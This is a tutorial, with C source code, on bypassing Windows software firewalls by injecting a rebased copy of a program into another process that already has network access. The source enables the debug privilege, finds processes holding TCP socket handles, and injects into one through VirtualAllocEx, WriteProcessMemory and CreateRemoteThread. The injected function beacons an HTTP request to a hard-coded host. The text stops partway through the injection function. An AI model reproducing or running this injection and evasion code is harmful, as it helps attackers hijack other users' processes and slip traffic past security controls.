Bypassing software firewalls using process infection

Introduction

Before we start: as most of you know, this article will probably be (and probably should be) overshadowed by rattle's article of the same title ( http://www.phrack.org/show.php?p=62&a=13 ). I have chosen to recreate it firstly because a lot of people have found it difficult to comprehend, and secondly because I've come across some improvements of my own worth adding.

It seems most of the issue is with the use of relocatable assembly code. While this is all 1337, all the same reasons for not using it pop up. Most of us sort of learn to read/write it, but it's never been as clear or expandable as a HLL. With some neat tricks, the computing underworld has circumvented such an issue. I'll try to explain it in a way that you guys (and I) can understand.

A quick walkthrough of things you’ll probably need to know

Like I said, a quick walkthrough; there are probably gigabytes of this crap on the interweb. It applies to win32 as it is now and probably to modern memory management across most OSes. If you are a cool cat you can probably just use this for reference.

Processes in memory

Processes are (virtual) address spaces that have executable code (that may or may not be currently executed). Modules are executables or libraries loaded into this address space, basically anything in PE format. Threads are a way to split execution of a process into parallel streams of instructions, usually independent of each other.

There are 4 types of address that exist, and we will only ever see 3 of them. The first is an actual physical address; we can forget about this one, as our operating system handles it. The second is an absolute address (as defined in a process space) that references a tangible address in that particular process space. That is, we don't need to do anything to it to make it point to the correct place. The third is what I'll call the virtual address: the absolute address of the base of the current module (the PE documentation calls this the image base). It doesn't really exist on its own, only to make our lives easier, and it is how we can calculate the absolute address of an RVA. A relative virtual address (or RVA) is defined as the absolute address minus this base address. If this sounds a little complicated, it is. I like to think of RVA as Relative _to_ _the_ Virtual Address. The goal of RVAs is to avoid hard coded addresses, or at least minimise their irreparable use. This brings us on to why we need them, and the windows loader.
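The relationship between an RVA and an absolute address is just an add or a subtract against the module base. A minimal sketch, assuming 32-bit addresses (the function names here are mine, for illustration only):

```c
#include <stdint.h>

/* Absolute address = module base + RVA. */
uint32_t rva_to_absolute(uint32_t module_base, uint32_t rva)
{
    return module_base + rva;
}

/* RVA = absolute address - module base. */
uint32_t absolute_to_rva(uint32_t module_base, uint32_t absolute)
{
    return absolute - module_base;
}
```

So a module based at 0x00400000 with an RVA of 0x1000 has that item at 0x00401000, and the same RVA stays valid wherever the module ends up.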

The windows loader

The windows loader has a simple purpose: it must fetch the file off the disk and make it work in memory. This sounds pretty simple, and in most cases it is. Its first step is to create the space and put the primary module (usually the executable you click) into memory. It then looks for any dependencies this executable has: libraries it needs like ws2_32.dll and probably/definitely kernel32.dll. Modules have preferred load addresses, and at the start all their in-code addresses will be absolute (or hard coded) addresses that assume this preferred address. So what happens if there is a collision? Well bummer, it needs to go somewhere else. This means that all hard coded addresses need to be changed, which is easy because (after ripping it off COFF) PE format has a section usually called .reloc which contains RVAs to hard coded addresses that need to be changed in the event of a collision. Now the reason executables usually have this stripped is that they are always loaded first, and so are certain to get their preferred load address. This is why dll injection works. The LoadLibrary() call pushes the windows loader to sort out the module's code, most likely using the .reloc table in the process. Therefore our goal is basically to emulate the windows loader, in order to execute our module in another process space. It's important to note that this isn't _all_ the windows loader does, but it's what is important to us for this article.

Brief PE format

Now this will be really brief; it would be really quite easy to waffle on into irrelevancy on this subject. To gain a (more) complete overview of PE format (and some other neat stuff) you should check the URLs/references for Matt Pietrek's article(s) on PE format.

The first structure is an IMAGE_DOS_HEADER. This has little interest to us, other than it has a pointer (an RVA, in the e_lfanew member) to the IMAGE_NT_HEADERS structure. This is important because we need to jump over a small stub program that tells DOS users to get with the freekin' times. The IMAGE_NT_HEADERS structure is plural for a reason: it actually contains two other structures, the IMAGE_FILE_HEADER which we won't really need, and the IMAGE_OPTIONAL_HEADER structure (which isn't optional). The IMAGE_OPTIONAL_HEADER has lots of pretty stuff in it, including the data directory. If you need to check if you're in the right place, IMAGE_NT_HEADERS also has a member called Signature, which should always be "PE\0\0".

The data directory is what we need to find first. It is an array of 16 IMAGE_DATA_DIRECTORY structures, each holding the address (an RVA) and size of one of the tables in the PE file: imports, exports, relocations, resources and so on. In short we need to find the base relocation table, which normally lives in the .reloc section. We do this by using a predefined index called IMAGE_DIRECTORY_ENTRY_BASERELOC (or 5). Remember, not all executables have this! You'll need to get your compiler to output it (MSVC: pass /fixed:no in the linker switches).
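To make the header walk concrete, here is a minimal sketch that finds a data directory entry in a PE image held in a plain byte buffer. It is portable C rather than windows.h code, it assumes a 32-bit (PE32) image, and the helper names (rd16, rd32, find_data_directory) are made up for this example. The numeric offsets come from the documented PE32 layout: e_lfanew at 0x3C, the optional header 24 bytes after the signature, and the data directory 96 bytes into the optional header.

```c
#include <stddef.h>
#include <stdint.h>

#define PE_DIR_BASERELOC 5u  /* same value as IMAGE_DIRECTORY_ENTRY_BASERELOC */

/* Read little-endian values from an unaligned byte buffer. */
uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 0 and fills *rva / *size on success, -1 if the buffer does not
   look like a PE32 image or the directory index is not present. */
int find_data_directory(const uint8_t *img, size_t len, unsigned index,
                        uint32_t *rva, uint32_t *size)
{
    uint32_t nt, opt, count;

    if (len < 0x40 || rd16(img) != 0x5A4D)       /* "MZ" */
        return -1;
    nt = rd32(img + 0x3C);                       /* e_lfanew */
    if (nt > len || len - nt < 24 + 96)
        return -1;
    if (rd32(img + nt) != 0x00004550)            /* "PE\0\0" */
        return -1;
    opt = nt + 24;                               /* signature + file header */
    if (rd16(img + opt) != 0x010B)               /* PE32 magic */
        return -1;
    count = rd32(img + opt + 92);                /* NumberOfRvaAndSizes */
    if (index >= count || index >= 16)
        return -1;
    if (len - opt < 96 + 8 * (size_t)(index + 1))
        return -1;
    *rva  = rd32(img + opt + 96 + 8 * index);
    *size = rd32(img + opt + 96 + 8 * index + 4);
    return 0;
}
```

If the returned size is zero for index 5, the image was linked without relocations and cannot be rebased this way.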

This brings us to the base relocations section. The base relocations section is laid out like this: a series of blocks, each of which corresponds to a page in memory. Each block lists the memory locations within its page that need to be altered. We calculate the change ourselves :).
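As a rough illustration of that layout, the sketch below walks a base relocation table held in a byte buffer and counts the entries that actually need patching. It assumes the documented block format (a 4-byte page RVA, a 4-byte block size that includes the 8-byte header, then 16-bit entries); the function and helper names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk every block in the table and count entries of type 3
   (IMAGE_REL_BASED_HIGHLOW). Type 0 entries are padding and are skipped. */
size_t count_highlow_entries(const uint8_t *reloc, size_t reloc_size)
{
    size_t pos = 0, total = 0;

    while (reloc_size - pos >= 8) {
        uint32_t block_size = rd32(reloc + pos + 4);   /* SizeOfBlock */
        size_t i, n;

        if (block_size < 8 || block_size > reloc_size - pos)
            break;                                     /* malformed table */
        n = (block_size - 8) / 2;                      /* 16-bit entries */
        for (i = 0; i < n; i++) {
            uint16_t entry = rd16(reloc + pos + 8 + 2 * i);
            if ((entry >> 12) == 3)
                total++;
        }
        pos += block_size;
    }
    return total;
}
```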

How software firewalls work

Software firewalls work by hooking API calls, usually as a driver. They then dictate who shall and who shall not be permitted to use them, usually by some use of checksums and tables of who the user has allowed.

Our idea is to "hide" in another process's space that has the privileges to access the internet, which in turn allows us to bypass the firewall. The act of injecting your code into another process's address space is called process infection (hence the title :). This usually happens without the application(s) knowing they have been infected.

Process infection without external dll or 1337 code

Right so, down to the mechanics. I've split this up into stages, partly because it makes it easier, and partly because it just divides up nicely. (As a quick reminder of what we're doing: we want to put our code in another process, and fix up all hard coded addresses using the .reloc section.)

First

We need to get some space (anywhere we can, it doesn't matter) in the other process. This is quite a complicated issue, as it appears only partially abstracted by windows, but well, whatever, we need to do it anyway. We can allocate ourselves a series of pages (if you don't know what pages are, don't worry. It's just memory to you and me) using the VirtualAllocEx() API. This takes 5 arguments, most of which I'll assume you understand, or can understand from the manual on msdn.microsoft.com. Points that are specifically important to us are passing NULL as the specified address (this allocates us memory anywhere it's available) and the protection values/reservation type. The protection values should be set to PAGE_EXECUTE_READWRITE which allows us to do everything we want, and the reservation (or allocation) type needs to be MEM_COMMIT | MEM_RESERVE.

The value that we are returned will be the new base address for our module. We must convert all absolute addresses to reflect that fact. That's a catch to remember, as things become a little complicated when dealing with multiple regions of memory.

Second

For this bit we'll need to know the size of our module (or the module to be injected). This can either be found using some of the module enumeration APIs or by traversing our own IMAGE_NT_HEADERS struct, finding the SizeOfImage member in the IMAGE_OPTIONAL_HEADER struct. With this we need to make a copy of ourselves, so we don't damage our own execution. To allocate memory, I like to use HeapAlloc(), if only for the reason there is an option to complain on error. Now you'd better CopyMemory() our module memory over into our newly allocated region :)

This local copy is where the module we are going to patch lives, but it is _not_ the address the module needs to be rebased to. That is the address returned in the first step above.

Third

This is where the actual rebasing procedure begins and ends. To find the .reloc section (I've briefly covered this before, but here it is more programmatically), we need to:

Find the DOS header. This is the base of the module (that we copied). From this, get e_lfanew (which is an RVA) and add it to the base of the module to get a pointer to the NT headers. The source code has a handy macro (which has been abused so much I don't know who to credit it to) for adding an integer to pointers without interference.

The absolute address of the .reloc table can then be found via the IMAGE_OPTIONAL_HEADER/DataDirectory structure(s). Somewhat like this:
OP_HEADER.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress plus the absolute address of the copied module. And yes, it is an RVA, not _the_ virtual address. Grunt.

The size of this section is also included in the same place, which is useful because we'll need to iterate through the blocks. For each block, the entries are words. The upper 4 bits indicate the type of relocation, which will be either IMAGE_REL_BASED_ABSOLUTE or IMAGE_REL_BASED_HIGHLOW. Ignore IMAGE_REL_BASED_ABSOLUTE as it is used as padding. The lower 12 bits are an offset from the block's virtual address (the VirtualAddress member at the start of the block, itself an RVA) to the hard coded address. To calculate exactly how much you need to add (otherwise known as the delta) to the hard coded address, subtract the preferred image base from the actual new address for the module. Add the delta to the value stored at the above offset from the block's (relative) virtual address. Continue this until you have looped through all the blocks. I think the source code shows this a little better than my fumbling English. :)
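The bit-twiddling and the delta arithmetic can be shown in isolation. This is only a sketch of the sums involved, in portable C with names I have made up (reloc_target, decode_reloc_entry, rebase_value); it does not touch any process or file.

```c
#include <stdint.h>

typedef struct {
    unsigned type;   /* upper 4 bits: 0 = ABSOLUTE (padding), 3 = HIGHLOW */
    uint32_t rva;    /* RVA of the hard coded address to patch */
} reloc_target;

/* Split a 16-bit relocation entry into its type and the RVA it refers to. */
reloc_target decode_reloc_entry(uint32_t page_rva, uint16_t entry)
{
    reloc_target t;
    t.type = (unsigned)(entry >> 12);
    t.rva  = page_rva + (uint32_t)(entry & 0x0FFF);
    return t;
}

/* New value for one hard coded 32-bit address. The delta may be "negative";
   unsigned arithmetic wraps modulo 2^32, which gives the right answer. */
uint32_t rebase_value(uint32_t stored, uint32_t preferred_base,
                      uint32_t new_base)
{
    uint32_t delta = new_base - preferred_base;
    return stored + delta;
}
```

For example, an entry of 0x3ABC in a block whose virtual address is 0x1000 is a HIGHLOW fixup at RVA 0x1ABC. If the value stored there is 0x00401234, the preferred base is 0x00400000 and the new base is 0x00A50000, the patched value is 0x00A51234.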

And finally

Write the rebased module to the other address space using WriteProcessMemory(). After this, all that needs to be done is to call CreateRemoteThread() on the new module (you should also be able to manipulate the thread context if CreateRemoteThread() is hooked). The entry point can be a (rebased) address from your module, or the AddressOfEntryPoint member in the optional header. Gold! (quite a lot of debugging later!)

Known Issues

Well, with the correct permissions this idea will be able to infect any process. However, we're not completely correctly emulating the windows loader. No doubt it performs many tasks that, at this stage, we just don't need to emulate. For example, the IAT could contain the wrong addresses if libraries have been loaded in different places, possibly causing an unidentified catastrophic error at runtime. Fix that with your own black magic :)

Beating hooks on CreateProcess(), and a different method of finding trusted processes

Many firewalls today hook CreateProcess(), and these catch out rattle's original method of launching an invisible browser to communicate. My method involves reading active TCP connections and the processes that host them. If we find one, we jack it.

We could do this by calling the GetExtendedTcpTable() API with AF_INET as the 'ulAf', indicating that we would like only IPv4 connections, and TCP_TABLE_OWNER_PID_CONNECTIONS as the table class. This should give us a list of active connections along with their owning pids to infect. If for any reason one should fail, we can simply move on to the next one in the list. It sounds simple enough; the trouble is that GetExtendedTcpTable (according to its documentation) was only just included in XP sp2. Other similar functions were only just included in XP. Our search for gingerbread missionaries continues.

After digging around, I can't find a documented way of uncovering network connections pre-XP. I have found, however, that using NtQuerySystemInformation() along with some undocumented stuff, we can enumerate all open handles in the system. We can then bring the handles into our address space using DuplicateHandle(), and so query their information (namely the device they are using) using NtQueryObject(). We can then filter for handles using "\Device\Tcp". At this point we could go further and query the device for information such as connection endpoints, connection states and port numbers. I feel that this would just further complicate an issue already far too complex. If they have an open handle to a socket, and we can read it, I assume that they are a viable target. To cope with the case where, well, a man goes down, my code includes some "continue until you're safely there" features that, well, you're all intelligent enough to understand and enjoy without me talking about it.

Conclusion

This method is different to most I've seen around. At this point, if English were not my native language, I would be making some excuses for any inadequacies in the way I have written. But it is, so check the source code for anywhere you get lost. I've tried to keep it commented, in the hope it might catch on.

Vale!

Source code

/* MAIN.C ---------------------*/
/* contains WinMain, base of app */

#include <windows.h>
#include <winsock.h>

#include "dmode.c"
#include "pInject.c"
#include "FindSocketHandles.c"

unsigned long InjectedFuncState; // global to notify the process injector of the injector func state
unsigned long LastEntryInjected = 0;

#define FUNC_INCOMPLETE 1 // a list of states InjectedFuncState can be
#define FUNC_SUCCESS 0
#define FUNC_FAILURE -1
#define FUNC_CONNECT_FAILURE -2 // important enough for its own code

/* some crap for our injected function */

typedef int (WINAPI *WSASTRT)
            (WORD, LPWSADATA);

typedef SOCKET (WINAPI *SOKT)
            (int, int, int);

typedef unsigned long (WINAPI *INET_ADR)
            ( const char* );

typedef unsigned short (WINAPI *HTNS)
            ( unsigned short );

typedef int (WINAPI *CNNCT)
            (SOCKET, const struct sockaddr*, int);

typedef int (WINAPI *SND)
            (SOCKET,  const char*, int, int);

typedef int (WINAPI *CLSE_SCK)
            (SOCKET);

typedef int (WINAPI *WSACLEAN)
            ();

/* more precisely crap so we can dynamically load winsock */

#define WSK_SENDSTR "GET /scripts/index.php?scan=hello%20from%20me HTTP/1.0\nFrom: Darth_Vader\nUser-Agent: Force/1.0\n\n"

int InjectedMeat(LPARAM lParam)
{
    // we can make any in-modular calls in the other process space here
    // beware of inter-modular calls, as they may have been located in different
    // places. this is why i've loaded winsock dynamically

    HMODULE hWinsock2;
    SOCKET mySock;
    WSADATA wsa_data;
    struct sockaddr_in RemoteAddrInfo;
    WSASTRT MyWSAStartup;
    SOKT MySocket;
    INET_ADR MyInetAddr;
    HTNS MyHtons;
    CNNCT MyConnect;
    SND MySend;
    CLSE_SCK MyCloseSocket;
    WSACLEAN MyWSACleanup;

    InjectedFuncState = FUNC_INCOMPLETE;

    hWinsock2 = LoadLibrary("ws2_32.dll");
        if (hWinsock2==NULL)
        { InjectedFuncState = FUNC_FAILURE; ExitThread(-1); }

    // at this point we assume it is all there, expect to die horribly if not
    MyWSAStartup = (WSASTRT)GetProcAddress(hWinsock2, "WSAStartup");
    MySocket = (SOKT)GetProcAddress(hWinsock2, "socket");
    MyInetAddr = (INET_ADR)GetProcAddress(hWinsock2, "inet_addr");
    MyHtons = (HTNS)GetProcAddress(hWinsock2, "htons");
    MyConnect = (CNNCT)GetProcAddress(hWinsock2, "connect");
    MySend  = (SND)GetProcAddress(hWinsock2, "send");
    MyCloseSocket = (CLSE_SCK)GetProcAddress(hWinsock2, "closesocket");
    MyWSACleanup = (WSACLEAN)GetProcAddress(hWinsock2, "WSACleanup");

    if(MyWSAStartup(MAKEWORD(2,0), &wsa_data)!=0)
    {
        InjectedFuncState = FUNC_FAILURE;
        WinMain(NULL, NULL, NULL, 0);
        ExitThread(0);
    }

    mySock = MySocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if(mySock==INVALID_SOCKET)
    {
        InjectedFuncState = FUNC_FAILURE;
        WinMain(NULL, NULL, NULL, 0);
        ExitThread(-1);
    }

    ZeroMemory(&RemoteAddrInfo, sizeof(struct sockaddr_in));
    RemoteAddrInfo.sin_family = AF_INET;
    RemoteAddrInfo.sin_addr.s_addr = MyInetAddr("192.168.0.2");
    RemoteAddrInfo.sin_port = MyHtons(80);

    if(MyConnect(mySock, (struct sockaddr *) &RemoteAddrInfo, sizeof(RemoteAddrInfo)) < 0)
    {

        InjectedFuncState = FUNC_CONNECT_FAILURE;
        WinMain(NULL, NULL, NULL, 0);
        ExitThread(-1);
    }

    MySend(mySock, WSK_SENDSTR, strlen(WSK_SENDSTR), 0);

    MyCloseSocket(mySock);
    MyWSACleanup(&wsa_data);

    InjectedFuncState = FUNC_SUCCESS;
    ExitThread(0);
  return 0;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                                LPSTR lpCmdLine, int nShowCmd)
{
    int ret;
    DWORD cbNeeded, dwRandIndex;
    POPEN_SOCK_HANDLE_INFO_EX pOSHIEx;
    char debugout[255];

    pOSHIEx = malloc(1);
    DebugMode(TRUE); //checking

    FindPIDsWithSocketHandles(pOSHIEx, 1, &cbNeeded);
        // sorry about the names here people, i kind of ran out of inspiration
    pOSHIEx = realloc(pOSHIEx, cbNeeded);
        // should probably check these
    FindPIDsWithSocketHandles(pOSHIEx, cbNeeded, &cbNeeded);
        // don't pass null for that last param, you'll probably crash 'n' burn
        // note: you can check the return values here
        // anything positive is a success - the number above zero indicates warnings

    dwRandIndex = 1 + LastEntryInjected;
    if (dwRandIndex > pOSHIEx->NumberOfEntries-1)
    {
        //we've probably used all our processes
        MessageBox(NULL, "CatastrophicError!", "PJECT", MB_ICONWARNING); //
        ExitThread(0);
    }

    LastEntryInjected++;

    sprintf(debugout, "injecting pid %d from %d poss", pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, pOSHIEx->NumberOfEntries);
    MessageBox(NULL, debugout, "INFO", MB_OK);

    ret = pInject(GetModuleHandle(NULL), pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, &InjectedMeat, GetCurrentProcessId());

    switch (ret)
    {
        case PINJECT_MEM_ERR:
            MessageBox(NULL, "THERE WAS A MEMORY ERROR", "FUCK", MB_OK);
            break;
        case PINJECT_RELOC_ERR:
            MessageBox(NULL, "THERE WAS A RELOC ERROR", "FUCK", MB_OK);
            break;
        case PINJECT_PROC_ACCESS_ERR:
            MessageBox(NULL, "THERE WAS A PROCESS ACCESS ERROR", "FUCK", MB_OK);
            break;
        case PINJECT_NO_RELOC:
            MessageBox(NULL, "YOU IDIOT. NO RELOC TABLE", "FUCK", MB_OK);
    }


    return 0;
}

/* dmode.c ---------------- */
/* contains DebugMode() to activate the debug privilege */

#ifndef SUCCESS
#define SUCCESS 0
#endif
#ifndef FAILURE
#define FAILURE 1
#endif

// DebugMode (BOOL)
// with occasionally a tongue in cheek reference as god mode =)
// activates the debug mode for the current process
// requires the privilege to be 'ENABLED'
// returns FAILURE on failure, and SUCCESS on success

int DebugMode(BOOL bToggle)
{
    HANDLE hToken;
    DWORD cbTokPriv = sizeof(TOKEN_PRIVILEGES);
    static TOKEN_PRIVILEGES tpGodModeActivated, tpOriginalMode;

    if (bToggle)
        {
        tpGodModeActivated.PrivilegeCount = 1;
        tpGodModeActivated.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tpGodModeActivated.Privileges[0].Luid);

        if (!OpenProcessToken(GetCurrentProcess(),
             TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
                        {
                            return FAILURE;
                        }

        if (!AdjustTokenPrivileges(hToken, FALSE, &tpGodModeActivated, sizeof(tpGodModeActivated),
                                    &tpOriginalMode, &cbTokPriv)  != ERROR_SUCCESS)
                            {
                                CloseHandle(hToken);
                                return FAILURE;
                            }
        CloseHandle(hToken);
        }

    else {

        if (! OpenProcessToken(GetCurrentProcess(),
                TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
                {
                    return FAILURE;
                }
        if (AdjustTokenPrivileges(hToken, FALSE, &tpOriginalMode, sizeof(tpOriginalMode), NULL, NULL)
                != ERROR_SUCCESS)
            {
                CloseHandle(hToken);
                return FAILURE;
            }

        }

    return SUCCESS;
}

/* pInject.c ---------------- */
/* functions related to process injection */
// pInject;
// contains functions related to process injection
// namely pInject ( DWORD dwPid, void* startAddress, DWORD dwAdditionalInfo)
// startAddress. Now that's a tough one !
// we will need to rebase that as well

// TODO:
// also fix IAT and other issues with relocatable code
// not a problem unless dlls are loaded in different places to in our address space
// if this is a problem (and this code hasn't been updated. now=9/6/2006)
// use GetProcAddress (assuming that's in the right place!)

#define PINJECT_SUCCESS 0
#define PINJECT_MEM_ERR -1
#define PINJECT_RELOC_ERR -2
#define PINJECT_PROC_ACCESS_ERR -3
#define PINJECT_NO_RELOC -4

#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (addValue) )
    // http://www.codeproject.com/dll/DLL_Injection_tutorial.asp
    // actually from a book by matt pietrek and whored out over the internet

int pInject(HANDLE hModule, DWORD dwInPid, void* pStartAddr, DWORD dwParam)
{
    HANDLE hOtherProcess;
    void *pNewModule, *pModuleAsData, *pBaseForRVA;
    WORD *wRelocRVAs;
    PIMAGE_DOS_HEADER pDOSHeader;
    PIMAGE_NT_HEADERS pNTHeader;
    PIMAGE_BASE_RELOCATION pBaseReloc;

    unsigned int i=0, j=0, nRelCount=0, offset;
    DWORD dwModSiz, dwWritten=0, dwMemDelta, dwBaseRelocSiz, *pAbsoluteRelocAddr, dwRelocSecOffset;

    // open the process
    hOtherProcess = OpenProcess(PROCESS_ALL_ACCESS,